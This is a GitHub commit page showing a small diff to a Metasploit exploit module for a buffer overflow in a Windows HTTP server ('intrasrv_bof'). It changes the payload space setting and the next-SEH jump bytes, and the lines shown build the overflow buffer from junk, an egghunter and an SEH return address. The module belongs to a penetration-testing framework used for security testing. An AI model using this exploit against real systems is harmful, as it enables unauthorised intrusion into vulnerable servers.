We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 7014322 commit 49bcec5Copy full SHA for 49bcec5
modules/exploits/windows/http/intrasrv_bof.rb
@@ -37,7 +37,7 @@ def initialize(info={})
37
],
38
'Payload' =>
39
{
40
- 'Space' => '4660',
+ 'Space' => 4660,
41
'StackAdjustment' => -3500,
42
'BadChars' => "\x00"
43
},
@@ -92,7 +92,7 @@ def exploit
92
buf = rand_text(target['Offset']-126) # junk to egghunter at jmp -128
93
buf << hunter # egghunter
94
buf << rand_text(target['Offset']-buf.length) # more junk to offset
95
- buf << "\xeb\x80\x90\x90" # nseh - jmp -128 to egghunter
+ buf << "\xeb\x80" + rand_text(2) # nseh - jmp -128 to egghunter
96
buf << [target.ret].pack("V*") # seh
97
98
# second last byte of payload/egg gets corrupted - pad 2 bytes
0 commit comments